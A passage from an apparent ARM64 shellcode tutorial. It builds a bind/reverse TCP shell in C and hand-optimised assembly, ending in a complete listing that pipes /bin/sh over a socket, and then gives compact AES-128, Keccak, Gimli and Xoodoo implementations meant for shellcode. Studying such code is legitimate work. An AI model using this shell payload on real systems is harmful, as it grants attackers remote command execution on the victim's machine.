          // assign socket or read end of output
          r = (fd == s) ? s     : out[0];
          // assign socket or write end of input
          w = (fd == s) ? in[1] : s;

          // read from socket or stdout        
          len = read(r, buf, BUFSIZ);

          if (!len) break;
          
          // encrypt/decrypt data here
          
          // write to socket or stdin        
          write(w, buf, len);        
        }      
        // remove 2 descriptors 
        epoll_ctl(efd, EPOLL_CTL_DEL, s, NULL);                  
        epoll_ctl(efd, EPOLL_CTL_DEL, out[0], NULL);                  
        close(efd);
      }
      // shutdown socket
      shutdown(s, SHUT_RDWR);
      close(s);
      #ifdef BIND
        close(s2);
      #endif
      // terminate shell      
      kill(pid, SIGCHLD);            
    }
    close(in[1]);
    close(out[0]);
    return 0; 
}

Let’s see how some of these calls were implemented using the A64 set. First, replacing the standard I/O handles with pipe descriptors.

  // assign read end to stdin
  dup3(in[0],  STDIN_FILENO,  0);
  // assign write end to stdout   
  dup3(out[1], STDOUT_FILENO, 0);
  // assign write end to stderr  
  dup3(out[1], STDERR_FILENO, 0);  

The write end of out is assigned to stdout and stderr while the read end of in is assigned to stdin. We can perform this with the following.

    mov     x8, SYS_dup3
    mov     x2, xzr
    mov     x1, xzr
    ldr     w0, [sp, in0]
    svc     0

    add     x1, x1, 1
    ldr     w0, [sp, out1]
    svc     0

    add     x1, x1, 1
    ldr     w0, [sp, out1]
    svc     0

Eleven instructions or 44 bytes are used for this. If we want to save a few bytes, we could use a loop instead. The value of STDIN_FILENO is conveniently zero and STDERR_FILENO is 2. We can simply loop from 0 to 3 and use a ternary operator to choose the correct descriptor.

  for (i=0; i<3; i++) {
    dup3(i==0 ? in[0] : out[1], i, 0);
  }

To perform the same operation in assembly, we can use the CSEL instruction.

    mov     x8, SYS_dup3
    mov     x1, (STDERR_FILENO + 1) // x1 = 3
    mov     x2, xzr                 // x2 = 0
    ldp     w4, w3, [sp, out1]      // w4 = out[1], w3 = in[0]
c_dup:
    subs    x1, x1, 1               // 
    csel    w0, w3, w4, eq          // w0 = (x1==0) ? in[0] : out[1]
    svc     0
    cbnz    x1, c_dup
    

Using a loop in place of what we orginally had, we remove three instructions and save a total of twelve bytes. A similar operation can be implemented for closing the pipe handles. In the C code, it simply closes each one in separate statements like so.

  // close pipes
  close(in[0]);  close(in[1]);
  close(out[0]); close(out[1]);

For the assembly code, a loop is used instead. Six instructions are used instead of eight.

    mov     x1, 4*4          // i = 4
    mov     x8, SYS_close
cls_pipe:
    sub     x1, x1, 4        // i--
    ldr     w0, [sp, x1]     // w0 = pipes[i]
    svc     0
    cbnz    x1, cls_pipe     // while (i != 0)

The epoll_pwait system call is used instead of the pselect6 system call to monitor file descriptors. Before calling epoll_pwait we must create an epoll file descriptor using epoll_create1 and add descriptors to it using epoll_ctl. The following code does that once a connection to remote peer has been established.

  // add 2 descriptors to monitor stdout and socket
  for (i=0; i<2; i++) {
    fd = (i==0) ? s : out[0];
    evts.data.fd = fd;
    evts.events  = EPOLLIN;
  
    epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
  }

All registers including the process state are preserved across system calls. So we could implement the above code using the following assembly code.

    mov     x8, SYS_epoll_ctl
    add     x3, sp, evts       // x3 = &evts
    mov     x1, EPOLL_CTL_ADD  // x1 = EPOLL_CTL_ADD
    mov     x4, EPOLLIN

    ldr     w2, [sp, s]        // w2 = s
    stp     x4, x2, [sp, evts]
    ldr     w0, [sp, efd]      // w0 = efd
    svc     0

    ldr     w2, [sp, out0]     // w2 = out[0]
    stp     x4, x2, [sp, evts]
    ldr     w0, [sp, efd]      // w0 = efd
    svc     0

Twelve instructions used here or forty-eight bytes. Using a loop, let’s see if we can save more space. Some of you may have noticed both EPOLL_CTL_ADD and EPOLLIN are 1. We can save 4 bytes with the following.

    // epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
    ldr     w2, [sp, s]
    ldr     w4, [sp, out0]
poll_init:
    mov     x8, SYS_epoll_ctl
    mov     x1, EPOLL_CTL_ADD
    add     x3, sp, evts
    stp     x1, x2, [x3]
    ldr     w0, [sp, efd]
    svc     0
    cmp     w2, w4
    mov     w2, w4
    bne     poll_init

The value returned by the epoll_pwait system call must be checked before continuing to process the events structure. If successful, it will return the number of file descriptors that were signalled while -1 will indicate an error.

  r = epoll_pwait(efd, &evts, 1, -1, NULL);
          
  // error? bail out           
  if (r < 0) break;

Recall in the Common Operations section where we test for -1. One could use the following assembly code.

    tst     x0, x0
    bl      cls_efd

A64 provides a conditional branch opcode that allows us to execute the IF statement in one instruction.

    tbnz    x0, 31, cls_efd

After this check, we then need to determine if the signal was the result of input. We are only monitoring for input to a read end of pipe and socket. Every other event would indicate an error.

  // not input? bail out
  if (!(evts.events & EPOLLIN)) break;

  fd = evts.data.fd;

The value of EPOLLIN is 1, and we only want those type of events. By masking the value of events with 1 using a bitwise AND, if the result is zero, then the peer has disconnected. Load pair is used to load both the events and data_fd values simultaneously.

    // x0 = evts.events, x1 = evts.data.fd
    ldp     x0, x1, [sp, evts]

    // if (!(evts.events & EPOLLIN)) break;
    tbz     w0, 0, cls_efd

Our code will read from either out[0] or s.

  // assign socket or read end of output
  r = (fd == s) ? s     : out[0];
  // assign socket or write end of input
  w = (fd == s) ? in[1] : s;

Using the highly useful conditional select instruction, we can select the correct descriptors to read and write to.

    // w3 = s
    ldr     w3, [sp, s]
    // w5 = in[1], w4 = out[0]
    ldp     w5, w4, [sp, in1]

    // fd == s
    cmp     w1, w3

    // r = (fd == s) ? s : out[0];
    csel    w0, w3, w4, eq

    // w = (fd == s) ? in[1] : s;
    csel    w3, w5, w3, eq

The final assembly code for the synchronized shell follows.

    .arch armv8-a
    .align 4

    // default TCP port
    .equ PORT, 1234

    // default host, 127.0.0.1
    .equ HOST, 0x0100007F

    // comment out for a reverse connecting shell
    .equ BIND, 1

    // comment out for code to behave as a function
    .equ EXIT, 1

    .include "include.inc"

    // structure for stack variables

          .struct 0
    p_in: .skip 8
          .equ in0, p_in + 0
          .equ in1, p_in + 4

    p_out:.skip 8
          .equ out0, p_out + 0
          .equ out1, p_out + 4

    id:   .skip 8
    efd:  .skip 4
    s:    .skip 4

    .ifdef BIND
    s2:   .skip 8
    .endif

    evts: .skip 16
          .equ events, evts + 0
          .equ data_fd,evts + 8

    buf:  .skip BUFSIZ
    ds_tbl_size:

    .global _start
    .text
_start:
    // allocate memory for variables
    // ensure data structure aligned by 16 bytes
    sub     sp, sp, (ds_tbl_size & -16) + 16

    // create pipes for stdin
    // pipe2(in, 0);
    mov     x8, SYS_pipe2
    mov     x1, xzr
    add     x0, sp, p_in
    svc     0

    // create pipes for stdout + stderr
    // pipe2(out, 0);
    add     x0, sp, p_out
    svc     0

    // syscall(SYS_gettid);
    mov     x8, SYS_gettid
    svc     0
    str     w0, [sp, id]

    // clone(CLONE_CHILD_SETTID   | 
    //       CLONE_CHILD_CLEARTID | 
    //       SIGCHLD, 0, NULL, NULL, &ctid)
    mov     x8, SYS_clone
    add     x4, sp, id           // ctid
    mov     x3, xzr              // newtls
    mov     x2, xzr              // ptid
    movl    x0, (CLONE_CHILD_SETTID + CLONE_CHILD_CLEARTID + SIGCHLD)
    svc     0
    str     w0, [sp, id]         // save id
    cbnz    w0, opn_con          // if already forked?
                                 // open connection
    // in this order..
    //
    // dup3 (out[1], STDERR_FILENO, 0);
    // dup3 (out[1], STDOUT_FILENO, 0);
    // dup3 (in[0],  STDIN_FILENO , 0);
    mov     x8, SYS_dup3
    mov     x1, STDERR_FILENO + 1
    ldr     w3, [sp, in0]
    ldr     w4, [sp, out1]
c_dup:
    subs    x1, x1, 1
    // w0 = (x1 == 0) ? in[0] : out[1];
    csel    w0, w3, w4, eq
    svc     0
    cbnz    x1, c_dup

    // close pipe handles in this order..
    //
    // close(in[0]);
    // close(in[1]);
    // close(out[0]);
    // close(out[1]);
    mov     x1, 4*4
    mov     x8, SYS_close
cls_pipe:
    sub     x1, x1, 4
    ldr     w0, [sp, x1]
    svc     0
    cbnz    x1, cls_pipe

    // execve("/bin/sh", NULL, NULL);
    mov     x8, SYS_execve
    movq    x0, BINSH
    str     x0, [sp, -16]!
    mov     x0, sp
    svc     0
opn_con:
    // close(in[0]);
    mov     x8, SYS_close
    ldr     w0, [sp, in0]
    svc     0

    // close(out[1]);
    ldr     w0, [sp, out1]
    svc     0

    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    mov     x8, SYS_socket
    mov     x1, SOCK_STREAM
    mov     x0, AF_INET
    svc     0

    mov     x2, 16      // x2 = sizeof(sin)
    str     w0, [sp, s] // w0 = s
.ifdef BIND
    movl    w1, (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
    str     x1, [sp, -16]!
    mov     x1, sp
    // bind (s, &sa, sizeof(sa));
    mov     x8, SYS_bind
    svc     0
    add     sp, sp, 16
    cbnz    x0, cls_sck  // if(x0 != 0) goto cls_sck

    // listen (s, 1);
    mov     x8, SYS_listen
    mov     x1, 1
    ldr     w0, [sp, s]
    svc     0

    // accept (s, 0, 0);
    mov     x8, SYS_accept
    mov     x2, xzr
    mov     x1, xzr
    ldr     w0, [sp, s]
    svc     0

    ldr     w1, [sp, s]      // load binding socket
    stp     w0, w1, [sp, s]
    mov     x0, xzr
.else
    movq    x1, ((HOST << 32) | (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET))
    str     x1, [sp, -16]!
    mov     x1, sp
    // connect (s, &sa, sizeof(sa));
    mov     x8, SYS_connect
    svc     0
    add     sp, sp, 16
    cbnz    x0, cls_sck      // if(x0 != 0) goto cls_sck
.endif
    // efd = epoll_create1(0);
    mov     x8, SYS_epoll_create1
    svc     0
    str     w0, [sp, efd]

    // epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
    ldr     w2, [sp, s]
    ldr     w4, [sp, out0]
poll_init:
    mov     x8, SYS_epoll_ctl
    mov     x1, EPOLL_CTL_ADD
    add     x3, sp, evts
    stp     x1, x2, [x3]
    ldr     w0, [sp, efd]
    svc     0
    cmp     w2, w4
    mov     w2, w4
    bne     poll_init
    // now loop until user exits or some other error
poll_wait:
    // epoll_pwait(efd, &evts, 1, -1, NULL);
    mov     x8, SYS_epoll_pwait
    mov     x4, xzr              // sigmask   = NULL
    mvn     x3, xzr              // timeout   = -1
    mov     x2, 1                // maxevents = 1
    add     x1, sp, evts         // *events   = &evts
    ldr     w0, [sp, efd]        // epfd      = efd
    svc     0

    // if (r < 0) break;
    tbnz    x0, 31, cls_efd

    // if (!(evts.events & EPOLLIN)) break;
    ldp     x0, x1, [sp, evts]
    tbz     w0, 0, cls_efd

    ldr     w3, [sp, s]
    ldp     w5, w4, [sp, in1]

    cmp     w1, w3

    // r = (fd == s) ? s : out[0];
    csel    w0, w3, w4, eq

    // w = (fd == s) ? in[1] : s;
    csel    w3, w5, w3, eq

    // read(r, buf, BUFSIZ);
    mov     x8, SYS_read
    mov     x2, BUFSIZ
    add     x1, sp, buf
    svc     0
    cbz     x0, cls_efd

    // encrypt/decrypt buffer

    // write(w, buf, len);
    mov     x8, SYS_write
    mov     w2, w0
    mov     w0, w3
    svc     0
    b       poll_wait
cls_efd:
    // epoll_ctl(efd, EPOLL_CTL_DEL, s, NULL);
    mov     x8, SYS_epoll_ctl
    mov     x3, xzr
    mov     x1, EPOLL_CTL_DEL
    ldp     w0, w2, [sp, efd]
    svc     0

    // epoll_ctl(efd, EPOLL_CTL_DEL, out[0], NULL);
    ldr     w2, [sp, out0]
    ldr     w0, [sp, efd]
    svc     0

    // close(efd);
    mov     x8, SYS_close
    ldr     w0, [sp, efd]
    svc     0

    // shutdown(s, SHUT_RDWR);
    mov     x8, SYS_shutdown
    mov     x1, SHUT_RDWR
    ldr     w0, [sp, s]
    svc     0
cls_sck:
    // close(s);
    mov     x8, SYS_close
    ldr     w0, [sp, s]
    svc     0

.ifdef BIND
    // close(s2);
    mov     x8, SYS_close
    ldr     w0, [sp, s2]
    svc     0
.endif
    // kill(pid, SIGCHLD);
    mov     x8, SYS_kill
    mov     x1, SIGCHLD
    ldr     w0, [sp, id]
    svc     0

    // close(in[1]);
    mov     x8, SYS_close
    ldr     w0, [sp, in1]
    svc     0

    // close(out[0]);
    mov     x8, SYS_close
    ldr     w0, [sp, out0]
    svc     0

.ifdef EXIT
    // exit(0);
    mov     x8, SYS_exit
    svc     0
.else
    // deallocate stack
    add     sp, sp, (ds_tbl_size & -16) + 16
    ret
.endif

7. Encryption

Every one of you reading this should learn about cryptography. Yes, it’s a complex subject, but you don’t need to be a mathematician just to learn about all the various algorithms that exist. Many cryptographic algorithms intended to protect data exist, but not all of them were designed for resource constrained-environments. In this section, you’ll see a number of cryptographic algorithms that you might consider using in a shellcode at some point. The block ciphers only implement encryption. That is to say, there is no inverse function provided and therefore cannot be used with a mode like Cipher Block Chaining (CBC) mode. Encryption is all that’s required to implement Counter (CTR) mode. Moreover, it’s likely that permutation-based cryptography will eventually replace traditional types of encryption. The algorithms shown here are intentionally optimized for size rather than speed.

Also…None of the algorithms presented here are written to protect against side-channel attacks. That’s just in case anyone wants to point out a weakness. 😉

7.1 AES-128

A block cipher published in 1998 and originally called ‘Rijndael’ after its designers, Vincent Rijmen and Joan Daemen. Today, it’s known as the Advanced Encryption Standard (AES). I’ve included it here because AES extensions are only an optional component of ARM. The Cortex A53 that comes with the Raspberry Pi 3 does not have support for AES. This implementation along with others can be found in this Github repository.

ADVANCED ENCRYPTION STANDARD (AES)

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned char B;
typedef unsigned int W;
// Multiplication over GF(2**8)
W M(W x){
    W t=x&0x80808080;
    return((x^t)*2)^((t>>7)*27);
}
// SubByte
B S(B w) {
    B j,y,z;
    
    if(w) {
      for(z=j=0,y=1;--j;y=(!z&&y==w)?z=1:y,y^=M(y));
      z=y;F(4)z^=y=(y<<1)|(y>>7);
    }
    return z^99;
}
void E(B *s) {
    W i,w,x[8],c=1,*k=(W*)&x[4];

    // copy plain text + master key to x
    F(8)x[i]=((W*)s)[i];

    for(;;){
      // AddRoundKey, 1st part of ExpandRoundKey
      w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];

      // AddRoundConstant, perform 2nd part of ExpandRoundKey
      w=R(w,8)^c;F(4)w=k[i]^=w;

      // if round 11, stop; 
      if(c==108)break; 
      
      // update round constant
      c=M(c);

      // SubBytes and ShiftRows
      F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(s[i]);

      // if not round 11, MixColumns
      if(c!=108)
        F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
    }
}

The handwritten assembly results in an approx. 40% less code when compared with GNU CC, generated assembly. The use of CCMP and CSEL for the statement : y = (!z && y == w) ? z = 1 : y; should protect against side-channel attacks. However, as I stated at the beginning of this section, I am not a cryptographer and do not wish to make security claims on the implementations provided here. The BFXIL instruction is used to replace the low 8-bits of register input to the SubByte subroutine.

// AES-128 Encryption in ARM64 assembly
// 352 bytes

    .arch armv8-a
    .text

    .global E

// *****************************
// Multiplication over GF(2**8)
// *****************************
M:
    and      w10, w14, 0x80808080
    mov      w12, 27
    lsr      w8, w10, 7
    mul      w8, w8, w12
    eor      w10, w14, w10
    eor      w10, w8, w10, lsl 1
    ret

// *****************************
// B SubByte(B x);
// *****************************
S:
    str      lr, [sp, -16]!
    ands     w7, w13, 0xFF
    beq      SB2

    mov      w14, 1
    mov      w15, 1
    mov      x3, 0xFF
SB0:
    cmp      w15, 1
    ccmp     w14, w7, 0, eq
    csel     w14, w15, w14, eq
    csel     w15, wzr, w15, eq
    bl       M
    eor      w14, w14, w10
    subs     x3, x3, 1
    bne      SB0

    and      w7, w14, 0xFF
    mov      x3, 4
SB1:
    lsr      w10, w14, 7
    orr      w14, w10, w14, lsl 1
    eor      w7, w7, w14
    subs     x3, x3, 1
    bne      SB1
SB2:
    mov      w10, 99
    eor      w7, w7, w10
    bfxil    w13, w7, 0, 8
    ldr      lr, [sp], 16
    ret

// *****************************
// void E(void *s);
// *****************************
E:
    str      lr, [sp, -16]!
    sub      sp, sp, 32

    // copy plain text + master key to x
    // F(8)x[i]=((W*)s)[i];
    ldp      x5, x6, [x0]
    ldp      x7, x8, [x0, 16]
    stp      x5, x6, [sp]
    stp      x7, x8, [sp, 16]

    // c = 1
    mov      w4, 1
L0:
    // AddRoundKey, 1st part of ExpandRoundKey
    // w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];
    mov      x2, xzr
    ldr      w13, [sp, 16+3*4]
    add      x1, sp, 16
L1:
    bl       S
    ror      w13, w13, 8
    ldr      w10, [sp, x2, lsl 2]
    ldr      w11, [x1, x2, lsl 2]
    eor      w10, w10, w11
    str      w10, [x0, x2, lsl 2]

    add      x2, x2, 1
    cmp      x2, 4
    bne      L1

    // AddRoundConstant, perform 2nd part of ExpandRoundKey
    // w=R(w,8)^c;F(4)w=k[i]^=w;
    eor      w13, w4, w13, ror 8
L2:
    ldr      w10, [x1]
    eor      w13, w13, w10
    str      w13, [x1], 4

    subs     x2, x2, 1
    bne      L2

    // if round 11, stop
    // if(c==108)break;
    cmp      w4, 108
    beq      L5

    // update round constant
    // c=M(c);
    mov      w14, w4
    bl       M
    mov      w4, w10

    // SubBytes and ShiftRows
    // F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(s[i]);
L3:
    ldrb     w13, [x0, x2]
    bl       S
    and      w10, w2, 3
    lsr      w11, w2, 2
    sub      w11, w11, w10
    and      w11, w11, 3
    add      w10, w10, w11, lsl 2
    strb     w13, [sp, w10, uxtw]

    add      x2, x2, 1
    cmp      x2, 16
    bne      L3

    // if (c != 108)
    cmp      w4, 108
L4:
    beq      L0
    subs     x2, x2, 4

    // MixColumns
    // F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
    ldr      w13, [sp, x2]
    eor      w14, w13, w13, ror 8
    bl       M
    eor      w14, w10, w13, ror 8
    eor      w14, w14, w13, ror 16
    eor      w14, w14, w13, ror 24
    str      w14, [sp, x2]

    b        L4
L5:
    add      sp, sp, 32
    ldr      lr, [sp], 16
    ret

7.2 KECCAK

A permutation function designed by the Keccak team (Guido Bertoni, Joan Daemen, Michaël Peeters and Gilles Van Assche).

#define R(v,n)(((v)<<(n))|((v)>>(64-(n))))
#define F(a,b)for(a=0;a<b;a++)
  
void keccak(void*p){
  unsigned long long n,i,j,r,x,y,t,Y,b[5],*s=p;
  unsigned char RC=1;
  
  F(n,24){
    F(i,5){b[i]=0;F(j,5)b[i]^=s[i+5*j];}
    F(i,5){
      t=b[(i+4)%5]^R(b[(i+1)%5],1);
      F(j,5)s[i+5*j]^=t;}
    t=s[1],y=r=0,x=1;
    F(j,24)
      r+=j+1,Y=2*x+3*y,x=y,y=Y%5,
      Y=s[x+5*y],s[x+5*y]=R(t,r%64),t=Y;
    F(j,5){
      F(i,5)b[i]=s[i+5*j];
      F(i,5)
        s[i+5*j]=b[i]^(~b[(i+1)%5]&b[(i+2)%5]);}
    F(j,7)
      if((RC=(RC<<1)^(113*(RC>>7)))&2)
        *s^=1ULL<<((1<<j)-1);
  }
}

The following source is an example of where preprocessor directives are used to ease implementation of the original source code. This would be first processed with CPP using the -E option. I’ve done this so it’s easier to create Keccak-p[800, 22] assembly code for the ARM32 or ARM64 architecture if required later.

The ARM instruction set doesn’t feature a modulus instruction. Unlike the DIV or IDIV instructions on x86, UDIV and SDIV don’t calculate the remainder. The solution is to use a bitwise AND where the divisor is a power of 2 and a combination of division, multiplication and subtraction for everything else. The formula for divisors that are not a power of 2 is : a - (n * int(a/n)). To implement in ARM64 assembly, UDIV and MSUB are used.

// keccak-p[1600, 24]
// 428 bytes

    .arch armv8-a
    .text
    .global k1600

    #define s x0
    #define n x1
    #define i x2
    #define j x3
    #define r x4
    #define x x5
    #define y x6
    #define t x7
    #define Y x8
    #define c x9   // round constant (unsigned char)
    #define d x10
    #define v x11
    #define u x12
    #define b sp   // local buffer

k1600:
    sub     sp, sp, 64
    // F(n,24){
    mov     n, 24
    mov     c, 1                // c = 1
L0:
    mov     d, 5
    // F(i,5){b[i]=0;F(j,5)b[i]^=s[i+j*5];}
    mov     i, 0                // i = 0
L1:
    mov     j, 0                // j = 0
    mov     u, 0                // u = 0
L2:
    madd    v, j, d, i          // v = (j * 5) + i
    ldr     v, [s, v, lsl 3]    // v = s[v]

    eor     u, u, v             // u ^= v

    add     j, j, 1             // j = j + 1
    cmp     j, 5                // j < 5
    bne     L2

    str     u, [b, i, lsl 3]    // b[i] = u

    add     i, i, 1             // i = i + 1
    cmp     i, 5                // i < 5
    bne     L1

    // F(i,5){
    mov     i, 0
L3:
    // t=b[(i+4)%5] ^ R(b[(i+1)%5], 63);
    add     v, i, 4             // v = i + 4
    udiv    u, v, d             // u = (v / 5)
    msub    v, u, d, v          // v = (v - (u * 5))
    ldr     t, [b, v, lsl 3]    // t = b[v]

    add     v, i, 1             // v = i + 1
    udiv    u, v, d             // u = (v / 5)
    msub    v, u, d, v          // v = (v - (u * 5))
    ldr     u, [b, v, lsl 3]    // u = b[v]

    eor     t, t, u, ror 63     // t ^= R(u, 63)

    // F(j,5)s[i+j*5]^=t;}
    mov     j, 0
L4:
    madd    v, j, d, i          // v = (j * 5) + i
    ldr     u, [s, v, lsl 3]    // u = s[v]
    eor     u, u, t             // u ^= t
    str     u, [s, v, lsl 3]    // s[v] = u 

    add     j, j, 1             // j = j + 1
    cmp     j, 5                // j < 5
    bne     L4

    add     i, i, 1             // i = i + 1
    cmp     i, 5                // i < 5
    bne     L3

    // t=s[1],y=r=0,x=1;
    ldr     t, [s, 8]           // t = s[1]
    mov     y, 0                // y = 0
    mov     r, 0                // r = 0
    mov     x, 1                // x = 1

    // F(j,24)
    mov     j, 0
L5:
    add     j, j, 1             // j = j + 1
    // r+=j+1,Y=(x*2)+(y*3),x=y,y=Y%5,
    add     r, r, j             // r = r + j
    add     Y, y, y, lsl 1      // Y = y * 3
    add     Y, Y, x, lsl 1      // Y = Y + (x * 2)
    mov     x, y                // x = y 
    udiv    y, Y, d             // y = (Y / 5)
    msub    y, y, d, Y          // y = (Y - (y * 5)) 

    // Y=s[x+y*5],s[x+y*5]=R(t, -(r - 64) % 64),t=Y;
    madd    v, y, d, x          // v = (y * 5) + x
    ldr     Y, [s, v, lsl 3]    // Y = s[v]
    neg     u, r
    ror     t, t, u             // t = R(t, u)
    str     t, [s, v, lsl 3]    // s[v] = t 
    mov     t, Y

    cmp     j, 24               // j < 24
    bne     L5

    // F(j,5){
    mov     j, 0                // j = 0
L6:
    // F(i,5)b[i] = s[i+j*5];
    mov     i, 0                // i = 0
L7:
    madd    v, j, d, i          // v = (j * 5) + i
    ldr     t, [s, v, lsl 3]    // t = s[v]
    str     t, [b, i, lsl 3]    // b[i] = t

    add     i, i, 1             // i = i + 1
    cmp     i, 5                // i < 5
    bne     L7

    // F(i,5)
    mov     i, 0                // i = 0
L8:
    // s[i+j*5] = b[i] ^ (b[(i+2)%5] & ~b[(i+1)%5]);}
    add     v, i, 2             // v = i + 2 
    udiv    u, v, d             // u = v / 5
    msub    v, u, d, v          // v = (v - (u * 5)) 
    ldr     t, [b, v, lsl 3]    // t = b[v]

    add     v, i, 1             // v = i + 1
    udiv    u, v, d             // u = v / 5 
    msub    v, u, d, v          // v = (v - (u * 5)) 
    ldr     u, [b, v, lsl 3]    // u = b[v]

    bic     u, t, u             // u = (t & ~u)

    ldr     t, [b, i, lsl 3]    // t = b[i]
    eor     t, t, u             // t ^= u

    madd    v, j, d, i          // v = (j * 5) + i
    str     t, [s, v, lsl 3]    // s[v] = t

    add     i, i, 1             // i++
    cmp     i, 5                // i < 5
    bne     L8

    add     j, j, 1
    cmp     j, 5
    bne     L6

    // F(j,7)
    mov     j, 0                // j = 0
    mov     d, 113
L9:
    // if((c=(c<<1)^((c>>7)*113))&2)
    lsr     t, c, 7             // t = c >> 7
    mul     t, t, d             // t = t * 113 
    eor     c, t, c, lsl 1      // c = t ^ (c << 1)
    and     c, c, 255           // c = c % 256 
    tbz     c, 1, L10           // if (c & 2)

    //   *s^=1ULL<<((1<<j)-1);
    mov     v, 1                // v = 1
    lsl     u, v, j             // u = v << j 
    sub     u, u, 1             // u = u - 1
    lsl     v, v, u             // v = v << u
    ldr     t, [s]              // t = s[0]
    eor     t, t, v             // t ^= v
    str     t, [s]              // s[0] = t
L10:
    add     j, j, 1             // j = j + 1
    cmp     j, 7                // j < 7
    bne     L9

    subs    n, n, 1             // n = n - 1
    bne     L0

    add     sp, sp, 64
    ret

7.3 GIMLI

A permutation function designed by Daniel J. Bernstein, Stefan Kölbl, Stefan Lucks, Pedro Maat Costa Massolino, Florian Mendel, Kashif Nawaz, Tobias Schneider, Peter Schwabe, François-Xavier Standaert, Yosuke Todo, and Benoît Viguier.

#define R(v,n)(((v)<<(n))|((v)>>(32-(n))))
#define X(a,b)(t)=(s[a]),(s[a])=(s[b]),(s[b])=(t)
  
void gimli(void*p){
  unsigned int r,j,t,x,y,z,*s=p;

  for(r=24;r>0;--r){
    for(j=0;j<4;j++)
      x=R(s[j],24),
      y=R(s[4+j],9),
      z=s[8+j],   
      s[8+j]=x^(z+z)^((y&z)*4),
      s[4+j]=y^x^((x|z)*2),
      s[j]=z^y^((x&y)*8);
    t=r&3;    
    if(!t)
      X(0,1),X(2,3),
      *s^=0x9e377900|r;   
    if(t==2)X(0,2),X(1,3);
  }
}

Thus far, I’ve only seen a hash function implemented with this algorithm. However, at the 2018 Advances in permutation-based cryptography, Benoît Viguier suggests using an Even-Mansour construction to implement a block cipher.

  
// Gimli in ARM64 assembly
// 152 bytes

    .arch armv8-a
    .text

    .global gimli

gimli:
    ldr    w8, =(0x9e377900 | 24)  // c = 0x9e377900 | 24; 
L0:
    mov    w7, 4                // j = 4
    mov    x1, x0               // x1 = s
L1:
    ldr    w2, [x1]             // x = R(s[j],  8);
    ror    w2, w2, 8

    ldr    w3, [x1, 16]         // y = R(s[4+j], 23);
    ror    w3, w3, 23

    ldr    w4, [x1, 32]         // z = s[8+j];

    // s[8+j] = x^(z<<1)^((y&z)<<2);
    eor    w5, w2, w4, lsl 1    // t0 = x ^ (z << 1)
    and    w6, w3, w4           // t1 = y & z
    eor    w5, w5, w6, lsl 2    // t0 = t0 ^ (t1 << 2)
    str    w5, [x1, 32]         // s[8 + j] = t0

    // s[4+j] = y^x^((x|z)<<1);
    eor    w5, w3, w2           // t0 = y ^ x
    orr    w6, w2, w4           // t1 = x | z       
    eor    w5, w5, w6, lsl 1    // t0 = t0 ^ (t1 << 1)
    str    w5, [x1, 16]         // s[4+j] = t0 

    // s[j] = z^y^((x&y)<<3);
    eor    w5, w4, w3           // t0 = z ^ y
    and    w6, w2, w3           // t1 = x & y
    eor    w5, w5, w6, lsl 3    // t0 = t0 ^ (t1 << 3)
    str    w5, [x1], 4          // s[j] = t0, s++

    subs   w7, w7, 1
    bne    L1                   // j != 0

    ldp    w1, w2, [x0]
    ldp    w3, w4, [x0, 8]

    // apply linear layer
    // t0 = (r & 3);
    ands   w5, w8, 3
    bne    L2

    // X(s[2], s[3]);
    stp    w4, w3, [x0, 8]
    // s[0] ^= (0x9e377900 | r);
    eor    w2, w2, w8
    // X(s[0], s[1]);
    stp    w2, w1, [x0]
L2:
    // if (t == 2)
    cmp    w5, 2
    bne    L3

    // X(s[0], s[2]);
    stp    w1, w2, [x0, 8]
    // X(s[1], s[3]);
    stp    w3, w4, [x0]
L3:
    sub    w8, w8, 1           // r--
    uxtb   w5, w8
    cbnz   w5, L0              // r != 0
    ret

7.4 XOODOO

A permutation function designed by the Keccak team. The cookbook includes information on implementing Authenticated Encryption (AE) and a tweakable Wide Block Cipher (WBC).

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define X(u,v)t=s[u],s[u]=s[v],s[v]=t
#define F(n)for(i=0;i<n;i++)
typedef unsigned int W;

void xoodoo(void*p){
  W e[4],a,b,c,t,r,i,*s=p;
  W x[12]={
    0x058,0x038,0x3c0,0x0d0,
    0x120,0x014,0x060,0x02c,
    0x380,0x0f0,0x1a0,0x012};

  for(r=0;r<12;r++){
    F(4)
      e[i]=R(s[i]^s[i+4]^s[i+8],18),
      e[i]^=R(e[i],9);
    F(12)
      s[i]^=e[(i-1)&3];
    X(7,4);X(7,5);X(7,6);
    s[0]^=x[r];
    F(4)
      a=s[i],
      b=s[i+4],
      c=R(s[i+8],21),
      s[i+8]=R((b&~a)^c,24),
      s[i+4]=R((a&~c)^b,31),
      s[i]^=c&~b;
    X(8,10);X(9,11);
  }
}

Again, this is all optimized for size rather than performance.

// Xoodoo in ARM64 assembly
// 268 bytes

    .arch armv8-a
    .text

    .global xoodoo

xoodoo:
    sub    sp, sp, 16          // allocate 16 bytes
    adr    x8, rc
    mov    w9, 12               // 12 rounds
L0:
    mov    w7, 0                // i = 0
    mov    x1, x0
L1:
    ldr    w4, [x1, 32]         // w4 = s[i+8]
    ldr    w3, [x1, 16]         // w3 = s[i+4]
    ldr    w2, [x1], 4          // w2 = s[i+0], advance x1 by 4

    // e[i] = R(s[i] ^ s[i+4] ^ s[i+8], 18);
    eor    w2, w2, w3
    eor    w2, w2, w4
    ror    w2, w2, 18

    // e[i] ^= R(e[i], 9);
    eor    w2, w2, w2, ror 9
    str    w2, [sp, x7, lsl 2]  // store in e

    add    w7, w7, 1            // i++
    cmp    w7, 4                // i < 4
    bne    L1                   //

    // s[i]^= e[(i - 1) & 3];
    mov    w7, 0                // i = 0
L2:
    sub    w2, w7, 1
    and    w2, w2, 3            // w2 = i & 3
